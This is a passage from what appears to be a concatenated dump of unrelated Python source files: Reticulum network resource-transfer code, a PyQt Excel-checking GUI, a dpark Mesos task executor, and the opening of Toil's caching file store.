self.compressed_data = self.uncompressed_data
self.uncompressed_size = len(self.uncompressed_data)
self.compressed_size = len(self.compressed_data)
if (self.compressed_size < self.uncompressed_size and auto_compress):
saved_bytes = len(self.uncompressed_data) - len(self.compressed_data)
RNS.log("Compression saved "+str(saved_bytes)+" bytes, sending compressed", RNS.LOG_DEBUG)
self.data = b""
self.data += RNS.Identity.get_random_hash()[:Resource.RANDOM_HASH_SIZE]
self.data += self.compressed_data
self.compressed = True
self.uncompressed_data = None
else:
self.data = b""
self.data += RNS.Identity.get_random_hash()[:Resource.RANDOM_HASH_SIZE]
self.data += self.uncompressed_data
self.uncompressed_data = self.data
self.compressed = False
self.compressed_data = None
if auto_compress:
RNS.log("Compression did not decrease size, sending uncompressed", RNS.LOG_DEBUG)
# Resources handle encryption directly to
# make optimal use of packet MTU on an entire
# encrypted stream. The Resource instance will
# use its underlying link directly to encrypt.
if not self.link.encryption_disabled():
self.data = self.link.encrypt(self.data)
self.encrypted = True
else:
self.encrypted = False
self.size = len(self.data)
self.sent_parts = 0
hashmap_entries = int(math.ceil(self.size/float(Resource.SDU)))
hashmap_ok = False
while not hashmap_ok:
hashmap_computation_began = time.time()
RNS.log("Starting resource hashmap computation with "+str(hashmap_entries)+" entries...", RNS.LOG_DEBUG)
self.random_hash = RNS.Identity.get_random_hash()[:Resource.RANDOM_HASH_SIZE]
self.hash = RNS.Identity.full_hash(data+self.random_hash)
self.expected_proof = RNS.Identity.full_hash(data+self.hash)
if original_hash == None:
self.original_hash = self.hash
else:
self.original_hash = original_hash
self.parts = []
self.hashmap = b""
collision_guard_list = []
for i in range(0,hashmap_entries):
data = self.data[i*Resource.SDU:(i+1)*Resource.SDU]
map_hash = self.get_map_hash(data)
if map_hash in collision_guard_list:
RNS.log("Found hash collision in resource map, remapping...", RNS.LOG_VERBOSE)
hashmap_ok = False
break
else:
hashmap_ok = True
collision_guard_list.append(map_hash)
if len(collision_guard_list) > ResourceAdvertisement.COLLISION_GUARD_SIZE:
collision_guard_list.pop(0)
part = RNS.Packet(link, data, context=RNS.Packet.RESOURCE)
part.pack()
part.map_hash = map_hash
self.hashmap += part.map_hash
self.parts.append(part)
RNS.log("Hashmap computation concluded in "+str(round(time.time()-hashmap_computation_began, 3))+" seconds", RNS.LOG_DEBUG)
if advertise:
self.advertise()
else:
pass
def hashmap_update_packet(self, plaintext):
if not self.status == Resource.FAILED:
self.last_activity = time.time()
self.retries_left = self.max_retries
update = umsgpack.unpackb(plaintext[RNS.Identity.HASHLENGTH//8:])
self.hashmap_update(update[0], update[1])
def hashmap_update(self, segment, hashmap):
if not self.status == Resource.FAILED:
self.status = Resource.TRANSFERRING
seg_len = ResourceAdvertisement.HASHMAP_MAX_LEN
hashes = len(hashmap)//Resource.MAPHASH_LEN
for i in range(0,hashes):
if self.hashmap[i+segment*seg_len] == None:
self.hashmap_height += 1
self.hashmap[i+segment*seg_len] = hashmap[i*Resource.MAPHASH_LEN:(i+1)*Resource.MAPHASH_LEN]
self.waiting_for_hmu = False
self.request_next()
def get_map_hash(self, data):
# TODO: This will break if running unencrypted,
# uncompressed transfers on streams with long blocks
# of identical bytes. Doing so would be very silly
# anyways but maybe it should be handled gracefully.
return RNS.Identity.full_hash(data+self.random_hash)[:Resource.MAPHASH_LEN]
def advertise(self):
"""
Advertise the resource. If the other end of the link accepts
the resource advertisement it will begin transferring.
"""
thread = threading.Thread(target=self.__advertise_job)
thread.daemon = True
thread.start()
def __advertise_job(self):
data = ResourceAdvertisement(self).pack()
self.advertisement_packet = RNS.Packet(self.link, data, context=RNS.Packet.RESOURCE_ADV)
while not self.link.ready_for_new_resource():
self.status = Resource.QUEUED
sleep(0.25)
try:
self.advertisement_packet.send()
self.last_activity = time.time()
self.adv_sent = self.last_activity
self.rtt = None
self.status = Resource.ADVERTISED
self.link.register_outgoing_resource(self)
RNS.log("Sent resource advertisement for "+RNS.prettyhexrep(self.hash), RNS.LOG_DEBUG)
except Exception as e:
RNS.log("Could not advertise resource, the contained exception was: "+str(e), RNS.LOG_ERROR)
self.cancel()
return
self.watchdog_job()
def watchdog_job(self):
thread = threading.Thread(target=self.__watchdog_job)
thread.daemon = True
thread.start()
def __watchdog_job(self):
self.__watchdog_job_id += 1
this_job_id = self.__watchdog_job_id
while self.status < Resource.ASSEMBLING and this_job_id == self.__watchdog_job_id:
while self.watchdog_lock:
sleep(0.025)
sleep_time = None
if self.status == Resource.ADVERTISED:
sleep_time = (self.adv_sent+self.default_timeout)-time.time()
if sleep_time < 0:
if self.retries_left <= 0:
RNS.log("Resource transfer timeout after sending advertisement", RNS.LOG_DEBUG)
self.cancel()
sleep_time = 0.001
else:
try:
RNS.log("No part requests received, retrying resource advertisement...", RNS.LOG_DEBUG)
self.retries_left -= 1
self.advertisement_packet.resend()
self.last_activity = time.time()
self.adv_sent = self.last_activity
sleep_time = 0.001
except Exception as e:
RNS.log("Could not resend advertisement packet, cancelling resource", RNS.LOG_VERBOSE)
self.cancel()
elif self.status == Resource.TRANSFERRING:
if not self.initiator:
rtt = self.link.rtt if self.rtt == None else self.rtt
sleep_time = self.last_activity + (rtt*self.timeout_factor) + Resource.RETRY_GRACE_TIME - time.time()
if sleep_time < 0:
if self.retries_left > 0:
RNS.log("Timed out waiting for parts, requesting retry", RNS.LOG_DEBUG)
if self.window > self.window_min:
self.window -= 1
if self.window_max > self.window_min:
self.window_max -= 1
if (self.window_max - self.window) > (self.window_flexibility-1):
self.window_max -= 1
sleep_time = 0.001
self.retries_left -= 1
self.waiting_for_hmu = False
self.request_next()
else:
self.cancel()
sleep_time = 0.001
else:
max_wait = self.rtt * self.timeout_factor * self.max_retries + self.sender_grace_time
sleep_time = self.last_activity + max_wait - time.time()
if sleep_time < 0:
RNS.log("Resource timed out waiting for part requests", RNS.LOG_DEBUG)
self.cancel()
sleep_time = 0.001
elif self.status == Resource.AWAITING_PROOF:
sleep_time = self.last_part_sent + (self.rtt*self.timeout_factor+self.sender_grace_time) - time.time()
if sleep_time < 0:
if self.retries_left <= 0:
RNS.log("Resource timed out waiting for proof", RNS.LOG_DEBUG)
self.cancel()
sleep_time = 0.001
else:
RNS.log("All parts sent, but no resource proof received, querying network cache...", RNS.LOG_DEBUG)
self.retries_left -= 1
expected_data = self.hash + self.expected_proof
expected_proof_packet = RNS.Packet(self.link, expected_data, packet_type=RNS.Packet.PROOF, context=RNS.Packet.RESOURCE_PRF)
expected_proof_packet.pack()
RNS.Transport.cache_request(expected_proof_packet.packet_hash, self.link)
self.last_part_sent = time.time()
sleep_time = 0.001
if sleep_time == 0:
RNS.log("Warning! Link watchdog sleep time of 0!", RNS.LOG_WARNING)
if sleep_time == None or sleep_time < 0:
RNS.log("Timing error, cancelling resource transfer.", RNS.LOG_ERROR)
self.cancel()
if sleep_time != None:
sleep(sleep_time)
def assemble(self):
if not self.status == Resource.FAILED:
try:
self.status = Resource.ASSEMBLING
stream = b"".join(self.parts)
if self.encrypted:
data = self.link.decrypt(stream)
else:
data = stream
# Strip off random hash
data = data[Resource.RANDOM_HASH_SIZE:]
if self.compressed:
self.data = bz2.decompress(data)
else:
self.data = data
calculated_hash = RNS.Identity.full_hash(self.data+self.random_hash)
if calculated_hash == self.hash:
self.file = open(self.storagepath, "ab")
self.file.write(self.data)
self.file.close()
self.status = Resource.COMPLETE
self.prove()
else:
self.status = Resource.CORRUPT
except Exception as e:
RNS.log("Error while assembling received resource.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
self.status = Resource.CORRUPT
self.link.resource_concluded(self)
if self.segment_index == self.total_segments:
if self.callback != None:
self.data = open(self.storagepath, "rb")
self.callback(self)
try:
self.data.close()
os.unlink(self.storagepath)
except Exception as e:
RNS.log("Error while cleaning up resource files, the contained exception was:", RNS.LOG_ERROR)
RNS.log(str(e))
else:
RNS.log("Resource segment "+str(self.segment_index)+" of "+str(self.total_segments)+" received, waiting for next segment to be announced", RNS.LOG_DEBUG)
def prove(self):
if not self.status == Resource.FAILED:
try:
proof = RNS.Identity.full_hash(self.data+self.hash)
proof_data = self.hash+proof
proof_packet = RNS.Packet(self.link, proof_data, packet_type=RNS.Packet.PROOF, context=RNS.Packet.RESOURCE_PRF)
proof_packet.send()
except Exception as e:
RNS.log("Could not send proof packet, cancelling resource", RNS.LOG_DEBUG)
RNS.log("The contained exception was: "+str(e), RNS.LOG_DEBUG)
self.cancel()
def validate_proof(self, proof_data):
if not self.status == Resource.FAILED:
if len(proof_data) == RNS.Identity.HASHLENGTH//8*2:
if proof_data[RNS.Identity.HASHLENGTH//8:] == self.expected_proof:
self.status = Resource.COMPLETE
self.link.resource_concluded(self)
if self.segment_index == self.total_segments:
# If all segments were processed, we'll
# signal that the resource sending concluded
if self.callback != None:
self.callback(self)
else:
# Otherwise we'll recursively create the
# next segment of the resource
Resource(self.input_file, self.link, callback = self.callback, segment_index = self.segment_index+1, original_hash=self.original_hash)
else:
pass
else:
pass
def receive_part(self, packet):
while self.receiving_part:
sleep(0.001)
self.receiving_part = True
self.last_activity = time.time()
self.retries_left = self.max_retries
if self.req_resp == None:
self.req_resp = self.last_activity
rtt = self.req_resp-self.req_sent
if self.rtt == None:
self.rtt = rtt
self.watchdog_job()
elif self.rtt < rtt:
self.rtt = rtt
if not self.status == Resource.FAILED:
self.status = Resource.TRANSFERRING
part_data = packet.data
part_hash = self.get_map_hash(part_data)
i = self.consecutive_completed_height
for map_hash in self.hashmap[self.consecutive_completed_height:self.consecutive_completed_height+self.window]:
if map_hash == part_hash:
if self.parts[i] == None:
# Insert data into parts list
self.parts[i] = part_data
self.received_count += 1
self.outstanding_parts -= 1
# Update consecutive completed pointer
if i == self.consecutive_completed_height + 1:
self.consecutive_completed_height = i
cp = self.consecutive_completed_height + 1
while cp < len(self.parts) and self.parts[cp] != None:
self.consecutive_completed_height = cp
cp += 1
i += 1
self.receiving_part = False
if self.__progress_callback != None:
self.__progress_callback(self)
if self.outstanding_parts == 0 and self.received_count == self.total_parts:
self.assemble()
elif self.outstanding_parts == 0:
# TODO: Figure out if there is a mathematically
# optimal way to adjust windows
if self.window < self.window_max:
self.window += 1
if (self.window - self.window_min) > (self.window_flexibility-1):
self.window_min += 1
self.request_next()
else:
self.receiving_part = False
# Called on incoming resource to send a request for more data
def request_next(self):
while self.receiving_part:
sleep(0.001)
if not self.status == Resource.FAILED:
if not self.waiting_for_hmu:
self.outstanding_parts = 0
hashmap_exhausted = Resource.HASHMAP_IS_NOT_EXHAUSTED
requested_hashes = b""
offset = (1 if self.consecutive_completed_height > 0 else 0)
i = 0; pn = self.consecutive_completed_height+offset
search_start = pn
for part in self.parts[search_start:search_start+self.window]:
if part == None:
part_hash = self.hashmap[pn]
if part_hash != None:
requested_hashes += part_hash
self.outstanding_parts += 1
i += 1
else:
hashmap_exhausted = Resource.HASHMAP_IS_EXHAUSTED
pn += 1
if i >= self.window or hashmap_exhausted == Resource.HASHMAP_IS_EXHAUSTED:
break
hmu_part = bytes([hashmap_exhausted])
if hashmap_exhausted == Resource.HASHMAP_IS_EXHAUSTED:
last_map_hash = self.hashmap[self.hashmap_height-1]
hmu_part += last_map_hash
self.waiting_for_hmu = True
requested_data = b""
request_data = hmu_part + self.hash + requested_hashes
request_packet = RNS.Packet(self.link, request_data, context = RNS.Packet.RESOURCE_REQ)
try:
request_packet.send()
self.last_activity = time.time()
self.req_sent = self.last_activity
self.req_resp = None
except Exception as e:
RNS.log("Could not send resource request packet, cancelling resource", RNS.LOG_DEBUG)
RNS.log("The contained exception was: "+str(e), RNS.LOG_DEBUG)
self.cancel()
# Called on outgoing resource to make it send more data
def request(self, request_data):
if not self.status == Resource.FAILED:
rtt = time.time() - self.adv_sent
if self.rtt == None:
self.rtt = rtt
if self.status != Resource.TRANSFERRING:
self.status = Resource.TRANSFERRING
self.watchdog_job()
self.retries_left = self.max_retries
wants_more_hashmap = True if request_data[0] == Resource.HASHMAP_IS_EXHAUSTED else False
pad = 1+Resource.MAPHASH_LEN if wants_more_hashmap else 1
requested_hashes = request_data[pad+RNS.Identity.HASHLENGTH//8:]
for i in range(0,len(requested_hashes)//Resource.MAPHASH_LEN):
requested_hash = requested_hashes[i*Resource.MAPHASH_LEN:(i+1)*Resource.MAPHASH_LEN]
search_start = self.receiver_min_consecutive_height
search_end = self.receiver_min_consecutive_height+ResourceAdvertisement.COLLISION_GUARD_SIZE
for part in self.parts[search_start:search_end]:
if part.map_hash == requested_hash:
try:
if not part.sent:
part.send()
self.sent_parts += 1
else:
part.resend()
self.last_activity = time.time()
self.last_part_sent = self.last_activity
break
except Exception as e:
RNS.log("Resource could not send parts, cancelling transfer!", RNS.LOG_DEBUG)
RNS.log("The contained exception was: "+str(e), RNS.LOG_DEBUG)
self.cancel()
if wants_more_hashmap:
last_map_hash = request_data[1:Resource.MAPHASH_LEN+1]
part_index = self.receiver_min_consecutive_height
search_start = part_index
search_end = self.receiver_min_consecutive_height+ResourceAdvertisement.COLLISION_GUARD_SIZE
for part in self.parts[search_start:search_end]:
part_index += 1
if part.map_hash == last_map_hash:
break
self.receiver_min_consecutive_height = max(part_index-1-Resource.WINDOW_MAX, 0)
if part_index % ResourceAdvertisement.HASHMAP_MAX_LEN != 0:
RNS.log("Resource sequencing error, cancelling transfer!", RNS.LOG_ERROR)
self.cancel()
else:
segment = part_index // ResourceAdvertisement.HASHMAP_MAX_LEN
hashmap_start = segment*ResourceAdvertisement.HASHMAP_MAX_LEN
hashmap_end = min((segment+1)*ResourceAdvertisement.HASHMAP_MAX_LEN, len(self.parts))
hashmap = b""
for i in range(hashmap_start,hashmap_end):
hashmap += self.hashmap[i*Resource.MAPHASH_LEN:(i+1)*Resource.MAPHASH_LEN]
hmu = self.hash+umsgpack.packb([segment, hashmap])
hmu_packet = RNS.Packet(self.link, hmu, context = RNS.Packet.RESOURCE_HMU)
try:
hmu_packet.send()
self.last_activity = time.time()
except Exception as e:
RNS.log("Could not send resource HMU packet, cancelling resource", RNS.LOG_DEBUG)
RNS.log("The contained exception was: "+str(e), RNS.LOG_DEBUG)
self.cancel()
if self.sent_parts == len(self.parts):
self.status = Resource.AWAITING_PROOF
if self.__progress_callback != None:
self.__progress_callback(self)
def cancel(self):
"""
Cancels transferring the resource.
"""
if self.status < Resource.COMPLETE:
self.status = Resource.FAILED
if self.initiator:
if self.link.status == RNS.Link.ACTIVE:
try:
cancel_packet = RNS.Packet(self.link, self.hash, context=RNS.Packet.RESOURCE_ICL)
cancel_packet.send()
except Exception as e:
RNS.log("Could not send resource cancel packet, the contained exception was: "+str(e), RNS.LOG_ERROR)
self.link.cancel_outgoing_resource(self)
else:
self.link.cancel_incoming_resource(self)
if self.callback != None:
self.link.resource_concluded(self)
self.callback(self)
def progress_callback(self, callback):
self.__progress_callback = callback
def progress(self):
"""
:returns: The current progress of the resource transfer as a *float* between 0.0 and 1.0.
"""
if self.initiator:
self.processed_parts = (self.segment_index-1)*math.ceil(Resource.MAX_EFFICIENT_SIZE/Resource.SDU)
self.processed_parts += self.sent_parts
self.progress_total_parts = float(self.grand_total_parts)
else:
self.processed_parts = (self.segment_index-1)*math.ceil(Resource.MAX_EFFICIENT_SIZE/Resource.SDU)
self.processed_parts += self.received_count
if self.split:
self.progress_total_parts = float(math.ceil(self.total_size/Resource.SDU))
else:
self.progress_total_parts = float(self.total_parts)
progress = self.processed_parts / self.progress_total_parts
return progress
def __str__(self):
return RNS.prettyhexrep(self.hash)+str(self.link)
class ResourceAdvertisement:
HASHMAP_MAX_LEN = 73
COLLISION_GUARD_SIZE = 2*Resource.WINDOW_MAX+HASHMAP_MAX_LEN
def __init__(self, resource=None):
if resource != None:
self.t = resource.size # Transfer size
self.d = resource.total_size # Total uncompressed data size
self.n = len(resource.parts) # Number of parts
self.h = resource.hash # Resource hash
self.r = resource.random_hash # Resource random hash
self.o = resource.original_hash # First-segment hash
self.m = resource.hashmap # Resource hashmap
self.c = resource.compressed # Compression flag
self.e = resource.encrypted # Encryption flag
self.s = resource.split # Split flag
self.i = resource.segment_index # Segment index
self.l = resource.total_segments # Total segments
self.f = 0x00 | self.s << 2 | self.c << 1 | self.e # Flags
def pack(self, segment=0):
hashmap_start = segment*ResourceAdvertisement.HASHMAP_MAX_LEN
hashmap_end = min((segment+1)*(ResourceAdvertisement.HASHMAP_MAX_LEN), self.n)
hashmap = b""
for i in range(hashmap_start,hashmap_end):
hashmap += self.m[i*Resource.MAPHASH_LEN:(i+1)*Resource.MAPHASH_LEN]
dictionary = {
"t": self.t, # Transfer size
"d": self.d, # Data size
"n": self.n, # Number of parts
"h": self.h, # Resource hash
"r": self.r, # Resource random hash
"o": self.o, # Original hash
"i": self.i, # Segment index
"l": self.l, # Total segments
"f": self.f, # Resource flags
"m": hashmap
}
return umsgpack.packb(dictionary)
@staticmethod
def unpack(data):
dictionary = umsgpack.unpackb(data)
adv = ResourceAdvertisement()
adv.t = dictionary["t"]
adv.d = dictionary["d"]
adv.n = dictionary["n"]
adv.h = dictionary["h"]
adv.r = dictionary["r"]
adv.o = dictionary["o"]
adv.m = dictionary["m"]
adv.f = dictionary["f"]
adv.i = dictionary["i"]
adv.l = dictionary["l"]
adv.e = True if (adv.f & 0x01) == 0x01 else False
adv.c = True if ((adv.f >> 1) & 0x01) == 0x01 else False
adv.s = True if ((adv.f >> 2) & 0x01) == 0x01 else False
return adv
|
mian.py
|
import sys,Ui_FormUi,Excel,threading
from PyQt5.QtWidgets import QApplication, QFileDialog, QMainWindow
def get_file():
name = QFileDialog.getOpenFileName(None,"选择文件", "/", "xlsx files (*.xlsx);;xls files (*.xls);;all files (*)")  # dialog title "选择文件" = "Select file"
if name[0] != "":
global path
path = name[0]
ui.filelabel.setText(path)
global sheet_list
sheet_list = Excel.GetSheet(path)
ui.sheetlist.clear()
for i in sheet_list:
ui.sheetlist.addItem(i)
ui.sheetlist.setCurrentRow(0)
ui.runbutton.setEnabled(True)
ui.rangecombom.setEnabled(True)
def run():
column = ui.rangecombom.itemText(ui.rangecombom.currentIndex())
selnum = ui.sheetlist.currentRow()
t = threading.Thread(target=Excel.verify,args=(path,sheet_list[selnum],column[0],ui.idbutton.isChecked(),),daemon = True)
t.start()
def main():
app = QApplication(sys.argv)
MainWindow = QMainWindow()
global ui
ui = Ui_FormUi.Ui_MainWindow()
ui.setupUi(MainWindow)
ui.getfilebutton.clicked.connect(get_file)
ui.runbutton.clicked.connect(run)
ui.exitbutton.clicked.connect(sys.exit)
ui.runbutton.setEnabled(False)
ui.rangecombom.setEnabled(False)
ui.idbutton.setChecked(True)
for asc in range(65,90 + 1):
ui.rangecombom.addItem("{}列".format(chr(asc)))  # "{}列" = "column {}"
MainWindow.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
executor.py
|
#!/usr/bin/env python
# hook for virtualenv
# switch to the virtualenv that the executor belongs to,
# rewriting all module search paths accordingly
import sys, os.path
P = 'site-packages'
apath = os.path.abspath(__file__)
if P in apath:
virltualenv = apath[:apath.index(P)]
sysp = [p[:-len(P)] for p in sys.path if p.endswith(P)][0]
if sysp != virltualenv:
sys.path = [p.replace(sysp, virltualenv) for p in sys.path]
import os
import pickle
import subprocess
import threading
from threading import Thread
import socket
import zmq
import dpark.pymesos as mesos
from dpark.pymesos import mesos_pb2
ctx = zmq.Context()
def forword(fd, addr, prefix=''):
f = os.fdopen(fd, 'r', 4096)
out = ctx.socket(zmq.PUSH)
out.connect(addr)
while True:
try:
line = f.readline()
if not line: break
out.send(prefix+line)
except IOError:
break
f.close()
out.close()
def reply_status(driver, task_id, status):
update = mesos_pb2.TaskStatus()
update.task_id.MergeFrom(task_id)
update.state = status
driver.sendStatusUpdate(update)
def launch_task(self, driver, task):
reply_status(driver, task.task_id, mesos_pb2.TASK_RUNNING)
host = socket.gethostname()
cwd, command, _env, shell, addr1, addr2, addr3 = pickle.loads(task.data)
prefix = "[%s@%s] " % (str(task.task_id.value), host)
outr, outw = os.pipe()
errr, errw = os.pipe()
t1 = Thread(target=forword, args=[outr, addr1, prefix])
t1.daemon = True
t1.start()
t2 = Thread(target=forword, args=[errr, addr2, prefix])
t2.daemon = True
t2.start()
wout = os.fdopen(outw,'w',0)
werr = os.fdopen(errw,'w',0)
if addr3:
subscriber = ctx.socket(zmq.SUB)
subscriber.connect(addr3)
subscriber.setsockopt(zmq.SUBSCRIBE, '')
poller = zmq.Poller()
poller.register(subscriber, zmq.POLLIN)
socks = dict(poller.poll(60 * 1000))
if socks and socks.get(subscriber) == zmq.POLLIN:
hosts = pickle.loads(subscriber.recv(zmq.NOBLOCK))
line = hosts.get(host)
if line:
command = line.split(' ')
else:
return reply_status(driver, task.task_id, mesos_pb2.TASK_FAILED)
else:
return reply_status(driver, task.task_id, mesos_pb2.TASK_FAILED)
try:
env = dict(os.environ)
env.update(_env)
if not os.path.exists(cwd):
print >>werr, 'CWD %s does not exist, using /tmp instead' % cwd
cwd = '/tmp'
p = subprocess.Popen(command,
stdout=wout, stderr=werr,
cwd=cwd, env=env, shell=shell)
self.ps[task.task_id.value] = p
p.wait()
code = p.returncode
if code == 0 or code is None:
status = mesos_pb2.TASK_FINISHED
else:
print >>werr, ' '.join(command) + ' exit with %s' % code
status = mesos_pb2.TASK_FAILED
except Exception, e:
status = mesos_pb2.TASK_FAILED
import traceback
print >>werr, 'exception while open ' + ' '.join(command)
for line in traceback.format_exc():
werr.write(line)
reply_status(driver, task.task_id, status)
wout.close()
werr.close()
t1.join()
t2.join()
tid = task.task_id.value
self.ps.pop(tid, None)
self.ts.pop(tid, None)
class MyExecutor(mesos.Executor):
def __init__(self):
self.ps = {}
self.ts = {}
def launchTask(self, driver, task):
t = Thread(target=launch_task, args=(self, driver, task))
t.daemon = True
t.start()
self.ts[task.task_id.value] = t
def killTask(self, driver, task_id):
try:
if task_id.value in self.ps:
self.ps[task_id.value].kill()
reply_status(driver, task_id, mesos_pb2.TASK_KILLED)
except: pass
def shutdown(self, driver):
for p in self.ps.values():
try: p.kill()
except: pass
for t in self.ts.values():
t.join()
if __name__ == "__main__":
executor = MyExecutor()
mesos.MesosExecutorDriver(executor).run()
|
cachingFileStore.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import str
from builtins import range
from builtins import object
from abc import abstractmethod, ABCMeta
from collections import namedtuple, defaultdict
from contextlib import contextmanager
from fcntl import flock, LOCK_EX, LOCK_UN
from functools import partial
from future.utils import with_metaclass
from six.moves.queue import Empty, Queue
import base64
import dill
import errno
import hashlib
import logging
import os
import shutil
import sqlite3
import stat
import sys
import tempfile
import threading
import time
import uuid
from toil.common import cacheDirName, getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.lib.humanize import bytes2human
from toil.lib.misc import mkdir_p, robust_rmtree
from toil.lib.objects import abstractclassmethod
from toil.resource import ModuleDescriptor
from toil.fileStores.abstractFileStore import AbstractFileStore
from toil.fileStores import FileID
logger = logging.getLogger(__name__)
if sys.version_info[0] < 3:
# Define a usable FileNotFoundError as will be raised by os.remove on a
# nonexistent file.
FileNotFoundError = OSError
class CacheError(Exception):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(CacheError, self).__init__(message)
class CacheUnbalancedError(CacheError):
"""
Raised if file store can't free enough space for caching
"""
message = 'Unable to free enough space for caching. This error frequently arises due ' \
'to jobs using more disk than they have requested. Turn on debug logging to see ' \
'more information leading up to this error through cache usage logs.'
def __init__(self):
super(CacheUnbalancedError, self).__init__(self.message)
class IllegalDeletionCacheError(CacheError):
"""
Error raised if the caching code discovers that a file representing a
reference to a cached file has gone missing.
This can be a big problem if a hard link is moved, because then the cache
will be unable to evict the file it links to.
Remember that files read with readGlobalFile may not be deleted by the user
and need to be deleted with deleteLocalFile.
"""
def __init__(self, deletedFile):
message = 'Cache tracked file (%s) has been deleted or moved by user ' \
'without updating the cache database. Use deleteLocalFile to ' \
'delete such files.' % deletedFile
super(IllegalDeletionCacheError, self).__init__(message)
class InvalidSourceCacheError(CacheError):
"""
Error raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(InvalidSourceCacheError, self).__init__(message)
class CachingFileStore(AbstractFileStore):
"""
A cache-enabled file store.
Provides files that are read out as symlinks or hard links into a cache
directory for the node, if permitted by the workflow.
Also attempts to write files back to the backing JobStore asynchronously,
after quickly taking them into the cache. Writes are only required to
finish when the job's actual state after running is committed back to the
job store.
Internally, manages caching using a database. Each node has its own
database, shared between all the workers on the node. The database contains
several tables:
files contains one entry for each file in the cache. Each entry knows the
path to its data on disk. It also knows its global file ID, its state, and
its owning worker PID. If the owning worker dies, another worker will pick
it up. It also knows its size.
File states are:
- "cached": happily stored in the cache. Reads can happen immediately.
Owner is null. May be adopted and moved to state "deleting" by anyone, if
it has no outstanding immutable references.
- "downloading": in the process of being saved to the cache by a non-null
owner. Reads must wait for the state to become "cached". If the worker
dies, goes to state "deleting", because we don't know if it was fully
downloaded or if anyone still needs it. No references can be created to a
"downloading" file except by the worker responsible for downloading it.
- "uploadable": stored in the cache and ready to be written to the job
store by a non-null owner. Transitions to "uploading" when a (thread of)
the owning worker process picks it up and begins uploading it, to free
cache space or to commit a completed job. If the worker dies, goes to
state "cached", because it may have outstanding immutable references from
the dead-but-not-cleaned-up job that was going to write it.
- "uploading": stored in the cache and being written to the job store by a
non-null owner. Transitions to "cached" when successfully uploaded. If
the worker dies, goes to state "cached", because it may have outstanding
immutable references from the dead-but-not-cleaned-up job that was
writing it.
- "deleting": in the process of being removed from the cache by a non-null
owner. Will eventually be removed from the database.
refs contains one entry for each outstanding reference to a cached file
(hard link, symlink, or full copy). The table name is refs instead of
references because references is an SQL reserved word. It remembers what
job ID has the reference, and the path the reference is at. References have
three states:
- "immutable": represents a hardlink or symlink to a file in the cache.
Dedicates the file's size in bytes of the job's disk requirement to the
cache, to be used to cache this file or to keep around other files
without references. May be upgraded to "copying" if the link can't
actually be created.
- "copying": records that a file in the cache is in the process of being
copied to a path. Will be upgraded to a mutable reference eventually.
- "mutable": records that a file from the cache was copied to a certain
path. Exist only to support deleteLocalFile's API. Only files with only
mutable references (or no references) are eligible for eviction.
jobs contains one entry for each job currently running. It keeps track of
the job's ID, the worker that is supposed to be running the job, the job's
disk requirement, and the job's local temp dir path that will need to be
cleaned up. When workers check for jobs whose workers have died, they null
out the old worker, and grab ownership of and clean up jobs and their
references until the null-worker jobs are gone.
properties contains key, value pairs for tracking total space available,
and whether caching is free for this run.
"""
def __init__(self, jobStore, jobGraph, localTempDir, waitForPreviousCommit, forceNonFreeCaching=False):
super(CachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, waitForPreviousCommit)
# For testing, we have the ability to force caching to be non-free, by never linking from the file store
self.forceNonFreeCaching = forceNonFreeCaching
# Variables related to caching
# Decide where the cache directory will be. We put it next to the
# local temp dirs for all of the jobs run on this machine.
# At this point in worker startup, when we are setting up caching,
# localTempDir is the worker directory, not the job directory.
self.localCacheDir = os.path.join(os.path.dirname(localTempDir),
cacheDirName(self.jobStore.config.workflowID))
# Since each worker has its own unique CachingFileStore instance, and only one Job can run
# at a time on a worker, we can track some stuff about the running job in ourselves.
self.jobName = str(self.jobGraph)
self.jobID = self.jobGraph.jobStoreID
logger.debug('Starting job (%s) with ID (%s).', self.jobName, self.jobID)
# When the job actually starts, we will fill this in with the job's disk requirement.
self.jobDiskBytes = None
# We need to track what attempt of the workflow we are, to prevent crosstalk between attempts' caches.
self.workflowAttemptNumber = self.jobStore.config.workflowAttemptNumber
# Make sure the cache directory exists
mkdir_p(self.localCacheDir)
# Connect to the cache database in there, or create it if not present
self.dbPath = os.path.join(self.localCacheDir, 'cache-{}.db'.format(self.workflowAttemptNumber))
# We need to hold onto both a connection (to commit) and a cursor (to actually use the database)
self.con = sqlite3.connect(self.dbPath)
self.cur = self.con.cursor()
# Note that sqlite3 automatically starts a transaction when we go to
# modify the database.
# To finish this transaction and let other people read our writes (or
# write themselves), we need to COMMIT after every coherent set of
# writes.
# Make sure to register this as the current database, clobbering any previous attempts.
# We need this for shutdown to be able to find the database from the most recent execution and clean up all its files.
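# Creating the link in a private temp directory and then rename()ing it over
# 'cache.db' makes the update atomic: other processes always see either the
# previous database link or the new one, never a partially created entry.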
linkDir = tempfile.mkdtemp(dir=self.localCacheDir)
linkName = os.path.join(linkDir, 'cache.db')
os.link(self.dbPath, linkName)
os.rename(linkName, os.path.join(self.localCacheDir, 'cache.db'))
if os.path.exists(linkName):
# TODO: How can this file exist if it got renamed away?
os.unlink(linkName)
os.rmdir(linkDir)
assert(os.path.exists(os.path.join(self.localCacheDir, 'cache.db')))
assert(os.stat(os.path.join(self.localCacheDir, 'cache.db')).st_ino == os.stat(self.dbPath).st_ino)
# Set up the tables
self._ensureTables(self.con)
# Initialize the space accounting properties
freeSpace, _ = getFileSystemSize(self.localCacheDir)
self.cur.execute('INSERT OR IGNORE INTO properties VALUES (?, ?)', ('maxSpace', freeSpace))
self.con.commit()
# Space used by caching and by jobs is accounted with queries
# We maintain an asynchronous upload thread, which gets kicked off when
# we commit the job's completion. It will be None until then. When it
# is running, it has exclusive control over our database connection,
# because the job we exist for will have already completed. However, it
# has to coordinate its activities with other CachingFileStore objects
# in the same process (and thus sharing the same PID) and ensure that
